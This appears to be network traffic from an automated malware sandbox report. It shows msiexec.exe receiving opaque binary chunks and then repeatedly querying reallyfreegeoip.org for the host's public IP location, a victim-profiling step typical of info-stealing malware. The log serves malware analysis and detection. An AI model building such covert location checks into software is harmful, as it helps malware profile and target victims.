2025-03-07 21:34:07 UTC	1378	IN	Data Raw: 13 bd 17 a7 1d 2c 46 0d 52 0d 9e d4 5f 1b db eb 68 35 12 57 da f9 47 1c 3c da 7c d2 00 e4 cb e0 6d e6 13 6f 2d 36 81 3a 75 64 80 4b c7 3a e8 3a 07 f4 fe 07 b9 b8 6e 0d cc 1b 72 79 c6 94 72 5b f3 29 5d ad f7 61 b5 00 3d 88 0d 1f 4e e7 d1 37 d9 32 36 8c 54 ea a6 83 a1 bb 9b 2f a1 d5 b1 bc 17 47 27 2a ba 30 4b 74 a1 71 ba c8 af de 2e 08 6e e8 00 01 2e bf 7d ad 54 d7 34 54 52 48 b6 86 14 e3 f4 96 2c 72 90 3b 77 e1 46 7a f5 be 53 26 29 a9 f8 33 73 a8 2b 7c 01 6f d9 bc 30 86 81 73 96 c6 08 3d cf 75 ab a8 23 1a 20 1a 2e 06 6b ee 87 07 9e fe b3 c8 a6 f4 7e 9c 08 f7 13 c1 10 52 c9 cf 6b 23 6f b7 c0 a1 ee 50 e1 a9 68 8b b1 53 0e a8 02 c2 c7 93 a7 33 fd 6a 17 fe 56 8d f0 59 66 57 6b 7f 6c 85 22 04 20 a3 8a fc e5 19 82 5e 2a 3c 96 c2 ad 19 d2 4e 95 ff 50 0e 52 68 a9 Data Ascii: ,FR_h5WG<\|mo-6:udK::nryr[)]a=N726T/G'0Ktq.n.}T4TRH,r;wFzS&)3s+\|o0s=u# .k~Rk#oPhS3jVYfWkl" ^<NPRh
2025-03-07 21:34:07 UTC	1378	IN	Data Raw: 3c 3d da 9c 9b b8 a4 5d 10 a8 6d d3 60 02 cf 75 3a 0c 51 cd fa 9d 10 3c fd 6f 72 aa 1b 6b 52 ee 3b 43 54 1b 58 d2 d8 4e 26 0a 10 53 a9 37 51 04 72 c2 11 3a 2d 25 fc a7 fa 15 c2 a5 c9 a7 0f 92 35 4c 67 df 72 f3 9a 6e 4f 6b e1 79 e5 60 a4 d8 e5 1f 69 f4 ce c8 26 eb 88 25 69 c0 1b 52 72 ef 32 9d 14 ae 71 6c e9 ec 8d a9 87 98 59 92 4a 76 a5 71 de f4 f7 62 ca fe 07 ee 06 27 00 19 34 b1 1f 8b 0c 63 c0 bd 1d 4e 85 34 b6 8b 13 70 a3 10 80 f1 b0 ec 9b f5 37 4e 74 af e0 9e 4d 30 65 ae 4b 7d d0 e2 99 34 db 3d 8b 4b ee fc ce 92 f2 8e 65 ba 86 9c 0a 02 9e 1a d9 fe 2d 46 09 00 6e 9c c5 2f 7f 86 4d 68 45 12 33 af eb 54 66 26 f8 54 de 11 eb b3 58 a8 e6 19 0a f5 36 aa 3b 1a ac 89 5d a2 8d 7d 29 0d 84 d6 5f b0 c6 5a 01 cc 17 72 65 c6 94 72 39 3d 10 8e a7 f7 70 94 7a 07 88 Data Ascii: <=]m`u:Q<orkR;CTXN&S7Qr:-%5LgrnOky`i&%iRr2qlYJvqb'4cN4p7NtM0eK}4=Ke-Fn/MhE3Tf&TX6;]})_Zrer9=pz
2025-03-07 21:34:07 UTC	1378	IN	Data Raw: ac 0d 61 14 f4 da 41 27 d5 36 ad 90 5c e5 8e 39 22 2a 50 23 d4 34 a6 b7 43 9e 34 fe 38 a8 11 b4 26 a8 6b 41 86 b4 ff fd 68 dc 69 67 40 87 99 5a 9d ea da 4e 77 1a 57 a4 63 f8 81 4a 99 5a eb eb 49 34 a9 b7 f7 15 0f 50 81 ae 46 5e 81 d5 02 a1 7d 58 4a d9 36 82 03 a6 d6 78 15 a8 10 1e 3f 20 a7 8f 9b 8e 3f 3e 0b da 31 48 48 9f 3d cc a8 b3 6a 50 fc 1c 58 28 43 38 fc ee b1 a7 7e 43 ae 59 b9 69 dc 3e da f7 ea 75 6b 31 37 17 3c 90 f3 f0 b7 7d 8a 47 6a d6 e9 56 1f cd ee 85 8f 86 3d 1f de 65 54 79 70 48 b8 ba 62 35 18 c6 c0 a5 07 cd ff 83 dc 14 fc 9b 3d d0 85 be d7 f7 32 b6 ac 1f 8e 73 13 ac 68 8b 1f 51 b7 95 35 28 f5 f7 7c 54 aa 1b 7d 7a bc 3b 02 ca 1b 78 d0 d4 4e 26 2c 68 53 a9 2a 51 18 ff a6 10 3a 2c 0e ea d5 da 19 c2 d5 e1 e5 0f 92 33 67 42 c8 0c 1a 9a 6e 4b fc Data Ascii: aA'6\9"P#4C48&kAhig@ZNwWcJZI4PF^}XJ6x? ?>1HH=jPX(C8~CYi>uk17<}GjV=eTypHb5=2shQ5(\|T}z;xN&,hSQ:,3gBnK
2025-03-07 21:34:07 UTC	1378	IN	Data Raw: e7 30 de 6a 12 24 e2 c4 85 b0 07 06 bc 73 ee 18 23 a6 01 40 32 f2 a8 7a 35 90 84 fc b9 b8 3e e7 d3 01 69 c6 d8 54 ab f9 38 45 93 e7 ba 5d cb ee 7c 90 0d 19 47 f4 e3 c1 76 ea c7 ea af 6a e9 d9 cd f3 15 cb 7f e0 34 20 3b 5c d2 a3 79 9d 5c 5b 11 ff 04 3f f0 0e 4c f9 9f 84 23 30 4d c2 de 16 6d e7 90 7b 78 d4 f8 1d 9c 8d fc 9f 24 ef e0 dd af a4 6d ea 8a 0a e0 e7 17 f0 08 80 64 d6 48 ae ba 48 58 b0 c6 f1 c9 bd 79 a8 b9 8f e9 e2 37 79 ae 2e 1c c8 46 d0 66 f4 80 03 f0 65 f2 8b 02 71 ca 78 8a ce ba 17 e6 49 d1 59 6e cd 5c 02 60 c1 cc a9 f7 56 2f aa 62 de 3c 8d d0 41 3c dd 27 46 90 5c eb d8 cb 22 2a 5e 5f 1b 46 f9 ac 43 ff 42 a1 8d b8 15 b6 6b 09 6b 31 9d c8 1c 3d 68 ac 4b 2f 4f f5 e4 24 5f 9a f2 12 77 0b 55 aa fe a8 91 38 68 78 fd e9 11 f0 a9 c7 5f 30 30 22 31 ae Data Ascii: 0j$s#@2z5>iT8E]\|Gvj4 ;\y\[?L#0Mm{x$mdHHXy7y.FfeqxIYn\`V/b<A<'F\"*^_FCBkk1=hK/O$_wU8hx_00"1
2025-03-07 21:34:07 UTC	1378	IN	Data Raw: 96 f1 67 92 c9 90 15 3f 50 5a 13 05 41 13 83 8c 4b 1b 5b d5 8f d8 7c 5f 7a d9 af ef 9f d1 ce 2c 4f d0 fc 05 a4 fb e1 a5 04 06 02 2b 33 7c 9e d8 37 b4 56 5b e7 13 5e 66 f1 67 a0 f2 61 43 87 35 b8 cc a6 b0 24 a6 ec 9b c4 f6 3c 67 ff 8f 66 e3 91 c9 c1 68 8b 35 8e 17 e0 80 82 cf ad cf b0 24 45 1b 73 92 60 c1 99 eb 9d 65 68 71 64 d0 8c 7b 60 59 ef bd 46 a2 1b 05 8e fd 1c 01 af 55 61 bf 39 35 f2 fc 59 0b de 3c 93 f5 da ec 82 22 9b da 72 f0 56 bb a0 e5 4d cd 0f 45 0c be 76 8e 9a 36 32 6b b1 7f 94 cc c5 a0 b5 ab 57 86 90 5b 04 fb b9 d7 e0 9e 51 8e 5a cf ee 12 24 ec d5 a4 ca 1b af bc 03 9a 14 27 b7 01 61 6d fb 26 19 4b ec fa bc b3 b8 2b cb 82 a7 69 c0 d2 8a c9 86 11 71 e3 67 99 4e e8 ea 8a fc 0d 08 49 06 eb d0 72 85 b8 dd af 60 ed 77 70 e2 30 93 5d c8 81 2a 28 53 Data Ascii: g?PZAK[\|_z,O+3\|7V[^fgaC5$<gfh5$Es`ehqd{`YFUa95Y<"rVMEv62kW[QZ$'am&K+iqgNIr`wp0]*(S
2025-03-07 21:34:07 UTC	1378	IN	Data Raw: 83 10 de ab ee 3d bd 71 88 60 a8 29 7f d8 80 0c c7 55 17 98 ba ed d8 32 94 d3 fc 36 b5 ae 67 99 8e 2c c1 cc 32 84 a6 58 b9 fa 3e 1c f2 b4 6e 44 c8 eb 6e 6e 98 ba 8c 98 b9 fd f5 82 b1 10 a0 8b 5e 1c 3a bc 81 a8 95 6e a4 65 1f 64 62 56 ae 25 de 10 a7 c8 ff 59 34 ee 32 71 89 22 42 71 c4 6e 46 80 86 0d fd 08 42 87 80 11 20 24 c9 f4 c7 5a 56 f3 27 d4 01 1f 6e 6d 39 ba 74 08 c3 b4 89 fd b6 64 2e 7c ff 17 bf 50 bf b6 41 62 b1 04 5a 54 8d 78 e5 5c 38 f9 2e 24 ba 81 1f cc f3 b8 70 8d 8f fd 08 c3 0e cc e8 eb ef a0 1f c4 10 53 35 55 f9 5a c7 65 ac a2 fb b9 96 bb f3 17 41 0e 4c 3b b4 33 e0 99 9a c5 0c 60 40 9e f8 4f 9a 84 d8 bc cc d4 da f7 43 53 5d bd 05 d7 47 c4 b3 7c 22 1b 3a 4f a0 81 cf 1f 00 25 e5 ed b1 71 11 3c ce af f8 11 f0 ae 43 06 f4 a6 ba 5e 39 c9 81 b2 54 Data Ascii: =q`)U26g,2X>nDnn^:nedbV%Y42q"BqnFB $ZV'nm9td.\|PAbZTx\8.$pS5UZeAL;3`@OCS]G\|":O%q<C^9T
2025-03-07 21:34:07 UTC	1378	IN	Data Raw: d1 2f b3 c7 d5 b3 81 f4 c2 d9 14 5f 21 73 82 55 48 b6 e1 d3 eb 1c fa fe f8 d3 82 6b f6 1f 0d c8 5b 8a 4b 8f 16 ac c3 87 3a 48 5b e2 0c 0e 7c 53 81 e1 c2 ef b6 84 ec 79 ca 7c 34 1d 52 64 6f 26 79 18 63 8b cf c6 f1 9d 68 3e ae 0c 44 11 46 b5 ff 27 3b 52 1b 1b 5f 61 5b ce e4 72 b3 dd a7 29 7a 32 3c 59 62 e8 88 82 e6 d5 de 60 9f 68 ed 74 a2 94 55 21 5d 21 d4 85 1d 48 34 cb 39 de 10 e9 c4 9e 35 f4 8e b9 ae 70 00 62 05 01 b1 85 bd 14 52 4a a2 96 df 5a 87 42 f9 69 00 4b f9 21 2c 9c a7 33 55 f2 01 ee 37 e0 f5 78 f7 0e a2 80 a7 ea 4c 04 66 2b e1 9a 6e f6 ab ee 39 59 54 92 13 83 2a 7f a8 51 2c dc 2b 87 98 ba e9 59 11 88 a1 8f 20 b5 de 83 b1 f9 2d c1 c6 5d 47 4f 5e b3 fa 66 20 f2 b4 65 30 0c eb 7e 64 8b b2 b4 a9 b9 fc ea c0 db 12 0b fc 48 34 ab bc 81 b3 83 ee 96 76 Data Ascii: /_!sUHk[K:H[\|Sy\|4Rdo&ych>DF';R_a[r)z2<Yb`htU!]!H495pbRJZBiK!,3U7xLf+n9YT*Q,+Y -]GO^f e0~dH4v
2025-03-07 21:34:07 UTC	1378	IN	Data Raw: 0c 16 07 cc 17 00 23 a6 2f 9e 96 24 8f 51 3c 5d 64 52 e8 d9 bf a1 23 a5 8f 8d de a1 f6 ff b7 bb e0 82 5d a2 31 1f f6 c0 79 64 09 93 bd 12 e8 6f 74 b1 43 c3 d9 fe 47 4b 66 be d7 b9 37 e3 2e 3f 99 54 ed 19 4e 62 0b f0 84 1c b7 a4 9b 3c 62 04 04 44 22 90 9d 42 e6 a5 6f 33 43 e7 51 8d 58 d9 fa 79 b2 5f 6d dc 06 9a 0f f4 5d 38 0b 15 3e 3d b3 aa c3 e9 32 6f 22 a2 b0 ff 73 92 3e 19 b5 39 b8 2b df ce 34 c8 68 8f 26 8c 2c 16 41 c3 03 7d c1 ff ac 2f e0 65 af 53 f6 c2 c8 d8 f9 4a 6f 76 b4 d5 63 9b f8 74 04 cd 4d cf 1a 48 ec f3 12 48 4c a1 c1 26 64 9b ea c1 90 c9 b3 e0 4f 88 1a 3c ef 2b 60 93 e6 76 bf 89 6c f5 06 04 35 b2 94 fc 53 fc 1f 18 71 11 36 39 a4 1f ac a2 3c 70 86 25 c2 06 1d 64 e0 b8 92 cb 8c a0 8e 8f c0 f3 10 47 b8 58 77 43 4b 25 09 7e e0 c0 91 e2 97 0b 52 Data Ascii: #/$Q<]dR#]1ydotCGKf7.?TNb<bD"Bo3CQXy_m]8>=2o"s>9+4h&,A}/eSJovctMHHL&dO<+`vl5Sq69<p%dGXwCK%~R

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49693	104.21.16.1	443	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 21:34:12 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-07 21:34:12 UTC	862	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:12 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 144633 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Thu, 06 Mar 2025 05:23:38 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WLdVk16xl%2FRL15x%2BDOXrsqy0QIm1btZ5xTviUxjTVXUX9DNgRRuSIT7o23dcFgsv0KVxakp4RgfTi3PS%2BMEpkLXSmVbsmNzla3ZfmdX%2FRx2u3sie%2FHcotrNaTdHP%2B8hhL0V8LA7F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cd372f487f8114-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=25323&min_rtt=24263&rtt_var=8662&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=100586&cwnd=250&unsent_bytes=0&cid=cda236b56e87c9f6&ts=697&x=0"
2025-03-07 21:34:12 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49694	104.21.16.1	443	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 21:34:14 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-03-07 21:34:15 UTC	860	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:15 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cf-Ray: 91cd373fa811eac2-ORD Server: cloudflare Age: 144636 Cache-Control: max-age=31536000 Cf-Cache-Status: HIT Last-Modified: Thu, 06 Mar 2025 05:23:38 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=093smzO6zOB3aOcwenL8kxJ1ZKEvUBX7%2B2K%2BByiZpf0dxs51oI9NUmg8bmMulO4BGnyq84uNjHFLGadumWF9TEkwwIYkKJIv9yT%2FtUkZLZgrTzn%2BjgNB%2BsuNjmAjajs9CJMMRFCb"}],"group":"cf-nel","max_age":604800} Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=42760&min_rtt=35141&rtt_var=23296&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=41058&cwnd=226&unsent_bytes=0&cid=38435debd557979f&ts=664&x=0"
2025-03-07 21:34:15 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49696	104.21.16.1	443	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 21:34:17 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-07 21:34:18 UTC	858	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:18 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 144639 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Thu, 06 Mar 2025 05:23:38 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ec5VYahUq0JDoUSsIqYPMckzoLdd6A9uz04w%2FFaa9lcqOrfhbyyX%2FyGT83XvzUjgqe67XTcYR1wWwnvSYpMXj%2FM4WFMDm19OR5LvMUUIO9zQqaQFfE6pwxqjjA0luPQLDAbg%2FrBI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cd3752ed0d6197-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24090&min_rtt=23383&rtt_var=7209&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=123818&cwnd=235&unsent_bytes=0&cid=94f84f98ffc39e64&ts=618&x=0"
2025-03-07 21:34:18 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49698	104.21.16.1	443	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 21:34:21 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-03-07 21:34:22 UTC	856	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:22 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 144643 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Thu, 06 Mar 2025 05:23:38 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BCiZyNd3XIuFKcDIWWYroscYrDt6o56knuc7%2Bz68G2tkLmqt9FUOiqcT5NeL%2FyF8UQ9rQHlqWvk2OSjY9nekzHMHvpqBveYeLYKudVNTU4ygKhz4kHnRnkpH3gnxhH13ZPtttbct"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cd376d5b536197-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19806&min_rtt=19202&rtt_var=6566&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=123618&cwnd=235&unsent_bytes=0&cid=a847687cc0137071&ts=749&x=0"
2025-03-07 21:34:22 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49700	104.21.16.1	443	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 21:34:25 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-03-07 21:34:26 UTC	866	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 144647 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Thu, 06 Mar 2025 05:23:38 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ECrsq4ciCfRxRB0hap2BgmCQ4GP2Q9%2BPTL2engm3zWPH%2FQe8Xt6WjIbUpeZO1G4CZRQo53xTa1f%2BXPnPDHra%2FnrE9%2B8FyMFDECOCZtBi0w33mpVHhOGlDuh3r%2FDK%2Bzx%2BypX9eXCv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cd3783aeee8107-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19590&min_rtt=18926&rtt_var=6600&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=123118&cwnd=245&unsent_bytes=0&cid=51820e4140fd50af&ts=634&x=0"
2025-03-07 21:34:26 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49702	104.21.16.1	443	856	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 21:34:28 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-03-07 21:34:29 UTC	860	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 21:34:28 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 144650 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Thu, 06 Mar 2025 05:23:38 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l3MInLPBeO63x3phShMpYNQp%2FnosFVxoyZVfReKEm%2F4sahf%2BHOpsaBUeXh0MIutTdkXickP%2BmHZhlIVu97Z2v3lQzsqgFjyyaPH6En65bmiENgVv%2FlUwtAbKG0HAZMsfWTUTdyuM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cd37971d4572ea-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=22090&min_rtt=20325&rtt_var=8776&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=103955&cwnd=181&unsent_bytes=0&cid=0a157d2d91f98e25&ts=618&x=0"
2025-03-07 21:34:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United 